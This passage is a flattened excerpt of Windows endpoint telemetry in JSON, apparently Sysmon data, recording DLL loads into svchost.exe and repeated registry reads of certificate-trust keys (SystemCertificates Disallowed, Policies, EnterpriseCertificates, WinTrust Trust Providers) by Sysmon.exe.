"timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "pcwum.dll", - "image_path": "C:\\Windows\\System32\\pcwum.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "mi.dll", - "image_path": "C:\\Windows\\System32\\mi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 